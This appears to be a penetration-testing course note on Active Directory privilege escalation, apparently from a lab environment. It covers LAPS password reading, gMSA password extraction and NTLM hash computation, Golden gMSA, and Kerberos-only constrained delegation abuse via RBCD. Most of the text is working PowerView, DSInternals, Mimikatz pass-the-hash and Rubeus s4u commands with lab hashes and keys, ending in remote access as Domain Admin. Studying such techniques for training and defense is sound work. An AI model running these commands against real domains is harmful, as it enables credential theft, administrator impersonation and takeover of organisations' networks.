AD Privesc

Some content is the same as in CRTP:

CRTP AD Privilege Escalation


LAPS (Local Administrator Password Solution) provides centralized storage of local users passwords in AD with periodic randomizing.

…it mitigates the risk of lateral escalation that results when customers have the same administrative local account and password combination on many computers.

  • Storage in clear text, transmission is encrypted (Kerberos).
  • Configurable using GPO.
  • Access control for reading clear text passwords using ACLs.
  • Only Domain Admins and explicitly allowed users can read the passwords.

Alt text

On a computer, if LAPS is in use, a library AdmPwd.dll can be found in the:

C:\Program Files\LAPS\CSE\ directory.

To find users who can read the passwords in clear text machines in OUs


Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

To enumerate OUs where LAPS is in use along with users who can read the passwords in clear text

Using Active Directory module


Using LAPS module (can be copied across machines):

Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
Find-AdmPwdExtendedRights -Identity OUDistinguishedName

Once we compromise the user which has the Rights, use the following to read clear-text passwords


Get-DomainObject -Identity <targetmachine$> | select - ExpandProperty ms-mcs-admpwd

Active Directory module:

Get-ADComputer -Identity <targetmachine> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

LAPS module:

Get-AdmPwdPassword -ComputerName <targetmachine>


A group Managed Service Account (gMSA) provides automatic password management, SPN management and delegated administration for service accounts across multiple servers.

Use of gMSA is recommended to protect from Kerberoast type attacks!

  • A 256 bytes random password is generated and is rotated every 30 days.
  • When an authorized user reads the attribute ‘msds-ManagedPassword’ the gMSA password is computed.
  • Only explicitly specified principals can read the password blob.
  • Even the Domain Admins can’t read it by default.

A gMSA has object class msDS-GroupManagedServiceAccount. This can be used to find the accounts

Using ADModule:

Get-ADServiceAccount -Filter *

Using PowerView:

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

The attribute *msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) lists the principals that can read the password blob**

Read it using ADModule:

Get-ADServiceAccount -Identity jumpone -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

The attribute msDS-ManagedPassword stores the password blob in binary form of MSDS-MANAGEDPASSWORD_BLOB

Once we have compromised a principal that can read the blob. Use ADModule to read and DSInternals to compute NTLM hash:

$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
Import-Module C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

The CurrentPassword attribute in the $decodedpwd contains the clear-text password but cannot be typed!

Passing the NTLM hash of the gMSA, we get privileges of the gMSA:

sekurlsa::pth /user:jumpone /domain:us.techcorp.local /ntlm:0a02c684cc0fa1744195edd1aec43078

We can access the services and machines (server farms) that the account has access to

Golden gMSA

gMSA password is calculated by leveraging the secret stored in KDS root key object

We need following attributes of the KDS root key to compute the Group Key Envelope (GKE):

- cn
- msKds-SecretAgreementParam
- msKds-RootKeyData
- msKds-KDFParam
- msKds-KDFAlgorithmID
- msKds-CreateTime
- msKds-UseStartTime
- msKds-Version
- msKds-DomainID
- msKds-PrivateKeyLength
- msKds-PublicKeyLength
- msKds-SecretAgreementAlgorithmID
  • Once we compute the GKE for the associated KDS root key we can generate the password offline.
  • Only privilege accounts such as Domain Admins, Enterprise Admins or SYSTEM can retrieve the KDS root key.
  • Once the KDS root key is compromised we can’t protect the associated gMSAs accounts.
  • Golden gMSA can be used to retrieve the information of gMSA account, KDS root key and generate the password offline.

Contrained Delegation (Kerberos Only)

It requires an additional forwardable ticket to invoke S4U2Proxy.

  • We cannot use S4U2Self as the service doesn’t have TRUSTED_TO_AUTH_FOR_DELEGATION value configured.

We can leverage RBCD to abuse Kerberos Only configuration:

  1. Create a new Machine Account
  2. Configure RBCD on the machine configured with Constrained Delegation.
  3. Obtain a TGS/Service Ticket for the machine configured with Constrained

Delegation by leveraging the newly created Machine Account:

Request a new forwardable TGS/Service Ticket by leveraging the ticket created in previous step.

Enumerate constrained delegation using ADModule:

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Since ms-DS-MachineAccountQuota is set to 10 for all domain users, any domain user can create a new Machine Account and join the same in the current domain.

Create a new Machine Account using Powermad.ps1 script:

Powermad on GitHub

. C:\AD\Tools\Powermad\Powermad.ps1
New-MachineAccount -MachineAccount studentcompX

We already compromised us-mgmt

Configure RBCD on us-mgmt using us-mgmt$ computer account:

C:\AD\Tools\Rubeus.exe asktgt /user:us-mgmt$ /aes256:cc3e643e73ce17a40a20d0fe914e2d090264ac6babbb86e99e74d74016ed51b2 /impersonateuser:administrator /domain:us.techcorp.local /ptt /nowrap

Using ADModule:

Set-ADComputer -Identity us-mgmt$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Obtain a TGS/Service Ticket for us-mgmt (machine configured with Constrained Delegation) by leveraging the newly created Machine Account (studentcompx):

C:\AD\Tools\Rubeus.exe hash /password:P@ssword@123
C:\AD\Tools\Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:D3E5739141450E529B07469904FE8BDC /msdsspn:cifs/ /nowrap

Request a new forwardable TGS/Service Ticket by leveraging the ticket created in previous step

C:\AD\Tools\Rubeus.exe s4u /tgs:doIGxjCCBsKgAwIBBaEDAgEWoo... /user:us-mgmt$ /aes256:cc3e643e73ce17a40a20d0fe914e2d090264ac6babbb86e99e74d74016ed51b2 /msdsspn:cifs/ /altservice:http /nowrap /ptt

Access the us-mssql using WinRM as the Domain Admin:

winrs cmd.exe